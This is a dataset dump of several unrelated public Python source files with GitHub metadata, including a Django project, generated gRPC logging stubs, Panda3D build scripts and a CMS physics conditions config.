blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
449248113ab98dd46f92d9e76576d832177aefbd | f9acfbff2744c014cd4adbc53d75316cacc00896 | /pycspr/api/get_node_peers.py | caff8d058e48be88cc650078538c0c1ab16f9b24 | [
"Apache-2.0"
] | permissive | Shr1ftyy/casper-python-sdk | 30fb3edc42551faef0b9bf10bf5a13ed8b5ac9f5 | 1c32ef89ef269f0307d530cfd635cfcbb3f29290 | refs/heads/main | 2023-07-27T17:17:40.054075 | 2021-07-29T09:58:12 | 2021-07-29T09:58:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | import jsonrpcclient as rpc_client
from pycspr.client import NodeConnectionInfo
# Method upon client to be invoked.
_API_ENDPOINT = "info_get_peers"
def execute(connection_info: NodeConnectionInfo) -> dict:
"""Returns node peers information.
:param connection_info: Information required to connect to a node.
:returns: Node peers information.
"""
response = rpc_client.request(connection_info.address_rpc, _API_ENDPOINT)
return response.data.result["peers"] | [
"[email protected]"
] | |
dfe782ae44d0c826f1cf828ff12d497febd5767c | 7b1a4d3c3ccdbb95202f8f38babaae087165928c | /backend/home/management/commands/load_initial_data.py | 7f4e12075bdbcce12eaff178de5c46492cd6885a | [] | no_license | crowdbotics-apps/find-me-4086 | cf5d7e6c9c48a3c0fd3cad669008e17f9056329c | e715d40c825b325ac4bd09f267f1c0a66e0b6645 | refs/heads/master | 2023-01-10T13:25:12.442913 | 2019-05-31T22:46:36 | 2019-05-31T22:46:36 | 189,666,285 | 0 | 0 | null | 2023-01-03T23:14:40 | 2019-05-31T22:39:01 | Python | UTF-8 | Python | false | false | 717 | py |
from django.core.management import BaseCommand
from home.models import CustomText, HomePage
def load_initial_data():
homepage_body = """
<h1 class="display-4 text-center">Find me</h1>
<p class="lead">
This is the sample application created and deployed from the crowdbotics slack app. You can
view list of packages selected for this application below
</p>"""
customtext_title = 'Find me'
CustomText.objects.create(title=customtext_title)
HomePage.objects.create(body=homepage_body)
class Command(BaseCommand):
can_import_settings = True
help = 'Load initial data to db'
def handle(self, *args, **options):
load_initial_data()
| [
"[email protected]"
] | |
70f0c42a9f45b0c0587d68145739c19c27479312 | 6efea391d0dd6087d8753057cff45867884fe5f1 | /google/cloud/logging_v2/proto/logging_pb2_grpc.py | e1759bbc1b990fe9d20bf576c1c5f12009895806 | [
"Apache-2.0"
] | permissive | tswast/python-logging | d9c4ae1ee87fb29436e2f16d9adac2a7a2d08378 | c4387b307f8f3502fb53ae1f7e1144f6284280a4 | refs/heads/master | 2022-12-30T19:50:14.840163 | 2020-08-12T20:28:40 | 2020-08-12T20:28:40 | 298,009,362 | 0 | 0 | Apache-2.0 | 2020-09-23T15:12:47 | 2020-09-23T15:12:46 | null | UTF-8 | Python | false | false | 6,922 | py | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.logging_v2.proto import (
logging_pb2 as google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class LoggingServiceV2Stub(object):
"""Service for ingesting and querying logs.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.DeleteLog = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/DeleteLog",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.DeleteLogRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.WriteLogEntries = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/WriteLogEntries",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesResponse.FromString,
)
self.ListLogEntries = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/ListLogEntries",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesResponse.FromString,
)
self.ListMonitoredResourceDescriptors = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/ListMonitoredResourceDescriptors",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.FromString,
)
self.ListLogs = channel.unary_unary(
"/google.logging.v2.LoggingServiceV2/ListLogs",
request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsResponse.FromString,
)
class LoggingServiceV2Servicer(object):
"""Service for ingesting and querying logs.
"""
def DeleteLog(self, request, context):
"""Deletes all the log entries in a log. The log reappears if it receives new
entries. Log entries written shortly before the delete operation might not
be deleted. Entries received after the delete operation with a timestamp
before the operation will be deleted.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def WriteLogEntries(self, request, context):
"""Writes log entries to Logging. This API method is the
only way to send log entries to Logging. This method
is used, directly or indirectly, by the Logging agent
(fluentd) and all logging libraries configured to use Logging.
A single request may contain log entries for a maximum of 1000
different resources (projects, organizations, billing accounts or
folders)
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListLogEntries(self, request, context):
"""Lists log entries. Use this method to retrieve log entries that originated
from a project/folder/organization/billing account. For ways to export log
entries, see [Exporting Logs](/logging/docs/export).
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListMonitoredResourceDescriptors(self, request, context):
"""Lists the descriptors for monitored resource types used by Logging.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListLogs(self, request, context):
"""Lists the logs in projects, organizations, folders, or billing accounts.
Only logs that have entries are listed.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def add_LoggingServiceV2Servicer_to_server(servicer, server):
rpc_method_handlers = {
"DeleteLog": grpc.unary_unary_rpc_method_handler(
servicer.DeleteLog,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.DeleteLogRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
"WriteLogEntries": grpc.unary_unary_rpc_method_handler(
servicer.WriteLogEntries,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesResponse.SerializeToString,
),
"ListLogEntries": grpc.unary_unary_rpc_method_handler(
servicer.ListLogEntries,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesResponse.SerializeToString,
),
"ListMonitoredResourceDescriptors": grpc.unary_unary_rpc_method_handler(
servicer.ListMonitoredResourceDescriptors,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.SerializeToString,
),
"ListLogs": grpc.unary_unary_rpc_method_handler(
servicer.ListLogs,
request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsRequest.FromString,
response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
"google.logging.v2.LoggingServiceV2", rpc_method_handlers
)
server.add_generic_rpc_handlers((generic_handler,))
| [
"[email protected]"
] | |
1c191670b95cd97eb7e9927c5966fe0fe092eed3 | c259bd9e4a570a1fa37949655530d778e5f5c46d | /mysite/.history/mysite/settings_20211014220254.py | edf1209e555479d4892a4fb712109c1d5b7bea7a | [] | no_license | ritikalohia/django-rest-students | 0cc56f435b7b2af881adfd7cace54eef98213c57 | ca5f9f466fcd74fef8ce91f019bcb6e7d83c8e20 | refs/heads/main | 2023-08-15T21:51:18.988691 | 2021-10-14T18:19:04 | 2021-10-14T18:19:04 | 417,219,011 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,239 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.2.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-vw0@qaq+af@an^ipzwchu$p*ywufp074e73!dtzcbara-qicvk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
f565c7f1049dafaeb6f59a5d1402e33d61f66f26 | cccf8da8d41ae2c14f5f4313c1edcf03a27956bb | /python/python2latex/writeLTXnonfrenchspacing.py | 500b80bebf55e18223970983e73099ddd5dc5c8a | [] | no_license | LucaDiStasio/transpilers | e8f8ac4d99be3b42a050148ca8fbc5d025b83290 | c55d4f5240083ffd512f76cd1d39cff1016909b8 | refs/heads/master | 2021-01-12T01:57:00.540331 | 2017-11-01T13:59:55 | 2017-11-01T13:59:55 | 78,448,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,438 | py | # Autogenerated with SMOP
from smop.core import *
#
@function
def writeLTXnonfrenchspacing(filepath=None,args=None,options=None,*args,**kwargs):
varargin = writeLTXnonfrenchspacing.varargin
nargin = writeLTXnonfrenchspacing.nargin
##
#==============================================================================
# Copyright (c) 2016-2017 Universite de Lorraine & Lulea tekniska universitet
# Author: Luca Di Stasio <[email protected]>
# <[email protected]>
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the distribution
# Neither the name of the Universite de Lorraine or Lulea tekniska universitet
# nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#==============================================================================
# DESCRIPTION
#
# A function to create a Latex file.
# Setting the command untoggles the command\frenchspacingand activates LaTeX standards to insert more space after a period (.) than after an ordinary character.#
##
fileId=fopen(filepath,'a')
fprintf(fileId,'\\n')
line='\\nonfrenchspacing'
if logical_not(strcmp(options,'none')) and logical_not(strcmp(options,'NONE')) and logical_not(strcmp(options,'None')):
line=strcat(line,'[',options,']')
if logical_not(isempty(args)):
line=strcat(line,'{')
for i in arange(1,length(args)).reshape(-1):
dims=size(args)
if dims[1] == 1 and dims[2] == 1:
line=strcat(line,args[i])
else:
if dims[1] > 1 and dims[2] == 1:
try:
line=strcat(line,args[i][1])
finally:
pass
else:
if dims[1] == 1 and dims[2] > 1:
try:
line=strcat(line,args[1][i])
finally:
pass
else:
line=strcat(line,args[i])
line=strcat(line,'}')
fprintf(fileId,strcat(line,'\\n'))
fclose(fileId)
return | [
"[email protected]"
] | |
187e3394d0b6b0785bd669990a1261ab0b325a6a | 9827506feaa1655c68ad88bf685ccce03d02a686 | /venv/lib/python3.6/enum.py | 42e7f3ca31565192c6da84c93a5785016df1ca0c | [] | no_license | taixingbi/django-postgres-config | 9ea53b0c117aa34605b27c9a9b06fb8cbb57669c | 00309dbe29ea528d94c00c6e6dea4ececde54d2d | refs/heads/master | 2020-04-11T17:00:51.890200 | 2018-12-15T21:32:26 | 2018-12-15T21:32:26 | 161,945,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | /Users/h/anaconda3/lib/python3.6/enum.py | [
"[email protected]"
] | |
caea2ec58c57adbd5f5dc9e9a63d8dc2b3c96220 | 85d41b34a472a2ec726b6fe9ebccc19a75159641 | /src/run_interrogate.py | c9fd70730d2eb2e009a3c248d42ab3bec617022d | [] | no_license | toontownretro/libotp | 186dacbe920b39a44840cc568cd76f1ea87ebd03 | 1ddfbd6526e88e887468c3c517a5d07dbc6e59be | refs/heads/master | 2022-12-19T10:55:28.239247 | 2020-09-14T00:59:03 | 2020-09-14T00:59:03 | 245,036,965 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,661 | py | import subprocess
import glob
import sys
import os
srcdir = os.path.abspath(os.path.dirname(__file__))
pandadir = os.path.abspath(sys.argv[1])
def run_command(cmd):
p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, shell=True)
ret = p.wait()
if ret != 0:
print("\n")
print('The following command return a non-zero value (%d): %s' % (ret, cmd))
sys.exit(ret)
def interrogate(module):
print('Interrogating', module)
cmd = os.path.join(pandadir, 'bin', 'interrogate')
cmd += ' -D__inline -DCPPPARSER -DP3_INTERROGATE=1 -D__cplusplus -fnames -string -refcount -assert'
cmd += ' -S"%(pandadir)s/include/parser-inc" -S"%(pandadir)s/include" -I"%(pandadir)s/include" -I"%(srcdir)s/movement" -I"%(srcdir)s/nametag"'
cmd += ' -I"%(srcdir)s/otpbase"'
cmd += ' -srcdir "%(srcdir)s/%(module)s"'
cmd += ' -oc "%(srcdir)s/%(module)s_igate.cxx" -od "%(srcdir)s/lib%(module)s.in" -python-native -DCPPPARSER -D__STDC__=1'
cmd += ' -D__cplusplus -D__inline -D_X86_ -DWIN32_VC -DWIN32 -module libotp -library %(module)s -Dvolatile='
cmd = cmd % {'pandadir': pandadir, 'module': module, 'srcdir': srcdir}
files = glob.glob(os.path.join(srcdir, module, '*.h'))
files += glob.glob(os.path.join(srcdir, module, '*.cxx'))
for file in files:
cmd += ' %s' % os.path.basename(file)
run_command(cmd)
for module in ('movement', 'nametag'):
interrogate(module)
os.chdir(srcdir)
cmd = os.path.join(pandadir, 'bin', 'interrogate_module') + ' -python-native -oc libotp_module.cxx'
cmd += ' -library libotp -module libotp libnametag.in libmovement.in'
run_command(cmd)
| [
"[email protected]"
] | |
9172f47544a3ec96a3b22276472d050776365b40 | 8df5df20ac10a8dc81f7ac6e21e835553a8f5e2d | /src/sleekapps/threads/signals/thread/thread.py | 62045b0ba77e61bb8a378d1da88a8b31a5019dbe | [] | no_license | adepeter/sleekforum | 7be71907d26623c43cd78a6da77a2398c1c25e26 | 35385e648974cdf009732af4c50b69a1825f7fda | refs/heads/master | 2022-09-18T02:45:42.522128 | 2021-10-23T06:41:44 | 2021-10-23T06:41:44 | 208,669,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | from django.core.cache import cache
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from .models import Thread, ThreadView
# from ..miscs.models.activity import Action
# from ..miscs.signals.activity import activity_updater
# #
# # @receiver(post_save, sender=Action)
# # def like_and_dislike_handler(sender, instance, created, **kwargs):
# # from django.contrib.contenttypes.models import ContentType
# # ct = ContentType.objects.get_for_model(instance).get_object_for_this_type()
# # if created:
# # get_ct_for_obj_of_instance = instance.content_object
# # if instance.action_value == Action.LIKE:
# # get_ct_for_obj_of_instance.likes = ct
# # print('Ading likes counter')
# # else:
# # print('Adding dislike counter')
# # get_ct_for_obj_of_instance.dislikes = ct
# # get_ct_for_obj_of_instance.save()
# #
# #
# # # @receiver(activity_updater)
# # # def hal(sender, **kwargs):
# # # print('Sender is', sender, kwargs.get('obj'))
| [
"[email protected]"
] | |
47466b53530a7e9c3f7c8c4065f831ce72d30c20 | 12abe02e205d3e8dabe78fb5a93ccca89e2c42c4 | /tools/prepare_client.py | 6e73dd03164c3faee99d8c53e13fe17142da37b8 | [] | no_license | nate97/toontown-src-py3.0 | 55092b2973b76e6b6d566887f44c52822684394c | f76c515801ae08c40b264b48365211fd44b137eb | refs/heads/master | 2022-07-07T05:23:22.071185 | 2022-06-22T16:36:10 | 2022-06-22T16:36:10 | 187,682,471 | 15 | 8 | null | null | null | null | UTF-8 | Python | false | false | 6,291 | py | #!/usr/bin/env python2
import argparse
import hashlib
import os
from panda3d.core import *
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--distribution', default='en',
help='The distribution string.')
parser.add_argument('--build-dir', default='build',
help='The directory in which to store the build files.')
parser.add_argument('--src-dir', default='..',
help='The directory of the Toontown Infinite source code.')
parser.add_argument('--server-ver', default='toontown-dev',
help='The server version of this build.')
parser.add_argument('--build-mfs', action='store_true',
help='When present, the resource multifiles will be built.')
parser.add_argument('--resources-dir', default='../resources',
help='The directory of the Toontown Infinite resources.')
parser.add_argument('--config-dir', default='../config/release',
help='The directory of the Toontown Infinite configuration files.')
parser.add_argument('--include', '-i', action='append',
help='Explicitly include this file in the build.')
parser.add_argument('--exclude', '-x', action='append',
help='Explicitly exclude this file from the build.')
parser.add_argument('--vfs', action='append',
help='Add this file to the virtual file system at runtime.')
parser.add_argument('modules', nargs='*', default=['otp', 'toontown'],
help='The Toontown Infinite modules to be included in the build.')
args = parser.parse_args()
print('Preparing the client...')
# Create a clean directory to store the build files in:
if os.path.exists(args.build_dir):
shutil.rmtree(args.build_dir)
os.mkdir(args.build_dir)
print('Build directory = ' + args.build_dir)
# Copy the provided Toontown Infinite modules:
def minify(f):
"""
Returns the "minified" file data with removed __debug__ code blocks.
"""
data = ''
debugBlock = False # Marks when we're in a __debug__ code block.
elseBlock = False # Marks when we're in an else code block.
# The number of spaces in which the __debug__ condition is indented:
indentLevel = 0
for line in f:
thisIndentLevel = len(line) - len(line.lstrip())
if ('if __debug__:' not in line) and (not debugBlock):
data += line
continue
elif 'if __debug__:' in line:
debugBlock = True
indentLevel = thisIndentLevel
continue
if thisIndentLevel <= indentLevel:
if 'else' in line:
elseBlock = True
continue
if 'elif' in line:
line = line[:thisIndentLevel] + line[thisIndentLevel+2:]
data += line
debugBlock = False
elseBlock = False
indentLevel = 0
continue
if elseBlock:
data += line[4:]
return data
for module in args.modules:
print('Writing module...', module)
for root, folders, files in os.walk(os.path.join(args.src_dir, module)):
outputDir = root.replace(args.src_dir, args.build_dir)
if not os.path.exists(outputDir):
os.mkdir(outputDir)
for filename in files:
if filename not in args.include:
if not filename.endswith('.py'):
continue
if filename.endswith('UD.py'):
continue
if filename.endswith('AI.py'):
continue
if filename in args.exclude:
continue
with open(os.path.join(root, filename), 'r') as f:
data = minify(f)
with open(os.path.join(outputDir, filename), 'w') as f:
f.write(data)
# Let's write game_data.py now. game_data.py is a compile-time generated
# collection of data that will be used by the game at runtime. It contains the
# PRC file data, and (stripped) DC file:
# First, we need to add the configuration pages:
configData = []
with open('../config/general.prc') as f:
configData.append(f.read())
configFileName = args.distribution + '.prc'
configFilePath = os.path.join(args.config_dir, configFileName)
print('Using configuration file: ' + configFilePath)
with open(configFilePath) as f:
data = f.readlines()
# Replace server-version definitions with the desired server version:
for i, line in enumerate(data):
if 'server-version' in line:
data[i] = 'server-version ' + args.server_ver
# Add our virtual file system data:
data.append('\n# Virtual file system...\nmodel-path /\n')
for filepath in args.vfs:
data.append('vfs-mount %s /\n' % filepath)
configData.append('\n'.join(data))
# Next, we need the DC file:
dcData = ''
filepath = os.path.join(args.src_dir, 'astron/dclass')
for filename in os.listdir(filepath):
if filename.endswith('.dc'):
fullpath = str(Filename.fromOsSpecific(os.path.join(filepath, filename)))
print('Reading %s...' % fullpath)
with open(fullpath, 'r') as f:
data = f.read()
for line in data.split('\n'):
if 'import' in line:
data = data.replace(line + '\n', '')
dcData += data
# Finally, write our data to game_data.py:
print('Writing game_data.py...')
gameData = 'CONFIG = %r\nDC = %r\n'
with open(os.path.join(args.build_dir, 'game_data.py'), 'wb') as f:
f.write(gameData % (configData, dcData.strip()))
# We have all of the code gathered together. Let's create the multifiles now:
if args.build_mfs:
print('Building multifiles...')
dest = os.path.join(args.build_dir, 'resources')
if not os.path.exists(dest):
os.mkdir(dest)
dest = os.path.realpath(dest)
os.chdir(args.resources_dir)
for phase in os.listdir('.'):
if not phase.startswith('phase_'):
continue
if not os.path.isdir(phase):
continue
filename = phase + '.mf'
print('Writing...', filename)
filepath = os.path.join(dest, filename)
os.system('multify -c -f "%s" "%s"' % (filepath, phase))
print('Done preparing the client.')
| [
"[email protected]"
] | |
d2aa6ff19836d34ff0dab5a45d47cf65bd7f3324 | 02802ecfff8639edc093068da740ded8ee8228aa | /test/test_inline_object8.py | 4de4d72fa7c421eec5426415f92be8159709b6ab | [] | no_license | mintproject/data-catalog-client | 0fc406c2063864144a9a995e98724144b43feb66 | 22afd6341e5f66594c88134834d58e4136e4983a | refs/heads/master | 2020-12-08T21:56:02.785671 | 2020-05-13T03:53:51 | 2020-05-13T03:53:51 | 233,105,679 | 1 | 1 | null | 2020-05-13T03:53:53 | 2020-01-10T18:17:55 | Python | UTF-8 | Python | false | false | 873 | py | # coding: utf-8
"""
MINT Data Catalog
API Documentation for MINT Data Catalog # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datacatalog
from datacatalog.models.inline_object8 import InlineObject8 # noqa: E501
from datacatalog.rest import ApiException
class TestInlineObject8(unittest.TestCase):
"""InlineObject8 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineObject8(self):
"""Test InlineObject8"""
# FIXME: construct object with mandatory attributes with example values
# model = datacatalog.models.inline_object8.InlineObject8() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
c8e9a6df4de37b414ea033965c80120dab0b6e57 | d36975caedab71aaaac26156105afaf59448e445 | /机器人传感系统/2.超声波距离传感器/读取距离数据_RestfulAPI.py | 00db909c44b8986e49e69f50e5f9072b82fad478 | [
"MIT"
] | permissive | mukgong/AI-robot | 3d84b444ac8d1a0cdb061eda19bb9319c9af036e | f89d91b67705878d9e87ae09a35b436495b66707 | refs/heads/master | 2022-12-25T01:07:37.174852 | 2020-10-05T01:44:50 | 2020-10-05T01:44:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | import requests
import json
def get_sensor():
sensor_url = "http://127.0.0.1:9090/v1/sensors/ultrasonic"
headers={'Content-Type':'application/json'}
response=requests.get(url=sensor_url, headers=headers)
print (response.content)
res = json.loads(response.content)
if (len(res["data"])>0):
print ("ultrasonic id = %d : value = %d "%(res["data"]["ultrasonic"][0]["id"],res["data"]["ultrasonic"][0]["value"]))
if __name__ == '__main__':
get_sensor() | [
"[email protected]"
] | |
4e18bb629d0cf47b38d4f4e6bcbfd8840cd16497 | 84abce44bd0278fa99e9556168290675f399834c | /EcalAlCaRecoProducers/config/reRecoTags/pulseShapeStudy_m100.py | 1130a38c27fbf75c327984fb96b19892b85b5ca7 | [] | no_license | ECALELFS/ECALELF | 7c304c6b544b0f22a4b62cf942f47fa8b58abef0 | 62a046cdf59badfcb6281a72923a0f38fd55e183 | refs/heads/master | 2021-01-23T13:36:31.574985 | 2017-06-22T12:26:28 | 2017-06-22T12:26:28 | 10,385,620 | 1 | 9 | null | 2017-06-30T12:59:05 | 2013-05-30T15:18:55 | C++ | UTF-8 | Python | false | false | 2,240 | py | import FWCore.ParameterSet.Config as cms
from CondCore.DBCommon.CondDBSetup_cfi import *
RerecoGlobalTag = cms.ESSource("PoolDBESSource",
CondDBSetup,
connect = cms.string('frontier://FrontierProd/CMS_CONDITIONS'),
globaltag = cms.string('74X_dataRun2_Prompt_v2'),
toGet = cms.VPSet(
cms.PSet(record = cms.string("EcalIntercalibConstantsRcd"),
tag = cms.string("EcalIntercalibConstants_2012ABCD_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_COND_31X_ECAL"),
),
cms.PSet(record = cms.string("EcalPulseShapesRcd"),
tag = cms.string("EcalPulseShapes_data"),
connect = cms.untracked.string("sqlite_file:/afs/cern.ch/cms/CAF/CMSALCA/ALCA_ECALCALIB/pulseShapes/ecaltemplates_popcon_timeShifted_-1p000000ns.db"),
),
cms.PSet(record = cms.string("EBAlignmentRcd"),
tag = cms.string("EBAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("EEAlignmentRcd"),
tag = cms.string("EEAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("ESAlignmentRcd"), # only Bon!
tag = cms.string("ESAlignment_measured_v08_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
)
)
| [
"[email protected]"
] | |
